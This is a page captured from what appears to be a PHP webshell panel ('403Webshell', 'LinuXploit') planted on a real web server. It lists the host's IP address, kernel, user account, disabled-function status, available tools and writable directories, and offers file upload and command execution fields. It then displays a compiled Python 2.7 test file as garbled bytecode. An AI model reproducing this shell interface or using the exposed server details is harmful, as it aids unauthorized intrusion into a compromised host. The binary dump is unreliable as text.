403Webshell
Server IP : 118.27.122.248  /  Your IP : 216.73.217.50
Web Server : Apache
System : Linux web0264.sh.tyo1 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
User : c9415830 ( 11735)
PHP Version : 8.4.17
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/python27/lib64/python2.7/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/alt/python27/lib64/python2.7/test/test_complex_args.pyc
�
�q2_c@sdddlZddlmZddlZdejfd��YZd�Zedkr`e�ndS(i����N(ttest_supporttComplexArgsTestCasecBskeZd�Zd�Zd�Zd�Zd�Zd�Zd�Zd�Z	d�Z
d	�Zd
�ZRS(cGs|j||�|�dS(N(tassertEqual(tselftfunctexpectedtargs((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pytcheckscBsejd�dUdS(Ns�
        def f(((((x))))): return x
        self.check(f, 1, 1)
        # Inner parens are elided, same as: f(x,)
        def f(((x)),): return x
        self.check(f, 2, 2)
        (ttextwraptdedent(R((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyttest_func_parens_no_unpackingscBsejd�dUdS(Ns
        def f(((((x),)))): return x
        self.check(f, 3, (3,))
        def f(((((x)),))): return x
        self.check(f, 4, (4,))
        def f(((((x))),)): return x
        self.check(f, 5, (5,))
        def f(((x),)): return x
        self.check(f, 6, (6,))
        (RR	(R((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyttest_func_1s	cBsejd�dUdS(NsP
        def f(((((x)),),)): return x
        self.check(f, 2, ((2,),))
        (RR	(R((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyttest_func_2&scBsejd�dUdS(NsV
        def f((((((x)),),),)): return x
        self.check(f, 3, (((3,),),))
        (RR	(R((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyttest_func_3,scBsejd�dUdS(Nsh
        def f((((((x)),),),), a, b, c): return x, a, b, c
        self.check(f, (3, 9, 8, 7), (((3,),),), 9, 8, 7)

        def f(((((((x)),)),),), a, b, c): return x, a, b, c
        self.check(f, (3, 9, 8, 7), (((3,),),), 9, 8, 7)

        def f(a, b, c, ((((((x)),)),),)): return a, b, c, x
        self.check(f, (9, 8, 7, 3), 9, 8, 7, (((3,),),))
        (RR	(R((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyttest_func_complex2s	cBsejd�dUdS(Ns�
        f = lambda (((((x))))): x
        self.check(f, 1, 1)
        # Inner parens are elided, same as: f(x,)
        f = lambda ((x)),: x
        self.check(f, 2, 2)
        (RR	(R((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyttest_lambda_parens_no_unpackingAscBsejd�dUdS(Ns

        f = lambda (((((x),)))): x
        self.check(f, 3, (3,))
        f = lambda (((((x)),))): x
        self.check(f, 4, (4,))
        f = lambda (((((x))),)): x
        self.check(f, 5, (5,))
        f = lambda (((x),)): x
        self.check(f, 6, (6,))
        (RR	(R((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyt
test_lambda_1Js	cBsejd�dUdS(NsO
        f = lambda (((((x)),),)): x
        self.check(f, 2, ((2,),))
        (RR	(R((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyt
test_lambda_2VscBsejd�dUdS(NsU
        f = lambda ((((((x)),),),)): x
        self.check(f, 3, (((3,),),))
        (RR	(R((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyt
test_lambda_3\scBsejd�dUdS(Nse
        f = lambda (((((x)),),),), a, b, c: (x, a, b, c)
        self.check(f, (3, 9, 8, 7), (((3,),),), 9, 8, 7)

        f = lambda ((((((x)),)),),), a, b, c: (x, a, b, c)
        self.check(f, (3, 9, 8, 7), (((3,),),), 9, 8, 7)

        f = lambda a, b, c, ((((((x)),)),),): (a, b, c, x)
        self.check(f, (9, 8, 7, 3), 9, 8, 7, (((3,),),))
        (RR	(R((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyttest_lambda_complexbs	(
t__name__t
__module__RR
RRR
RRRRRR(((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyRs													cCs6tjdtfdtf��tjt�WdQXdS(Ns*tuple parameter unpacking has been removeds(parenthesized argument names are invalid(Rtcheck_py3k_warningst
SyntaxWarningtrun_unittestR(((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyt	test_mainos	t__main__(tunittestttestRRtTestCaseRRR(((s;/opt/alt/python27/lib64/python2.7/test/test_complex_args.pyt<module>si	

Youez - 2016 - github.com/yon3zu
LinuXploit